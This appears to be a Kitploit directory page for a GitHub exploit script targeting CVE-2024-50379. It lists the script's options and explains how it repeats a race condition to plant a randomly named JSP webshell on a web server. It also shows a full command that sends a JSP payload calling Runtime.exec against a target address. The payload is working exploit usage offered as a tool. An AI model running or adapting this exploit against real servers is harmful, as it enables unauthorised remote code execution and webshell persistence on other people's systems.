Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-50379-exp — CVE-2024-50379-exp | Kitploit
Tools/GitHubGitHub/lux-j/cve-2024-50379-exp
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHublux-j/cve-2024-50379-exp

CVE-2024-50379-exp

CVE-2024-50379-exp

View Repository
111 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-50379-exp

  • -t race condition time
  • -u domain
  • -f write webshell

Testing found that during the first race condition, there is a high probability that writing will fail. Another race condition is required to write the webshell. Therefore, the script first performs a fixed 6-second race condition check to see if it is written. If not, it then performs a user-defined or default 10-second check. The generated webshell is random md5.jsp.

root@kitploit:~
python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10

image

Download Tool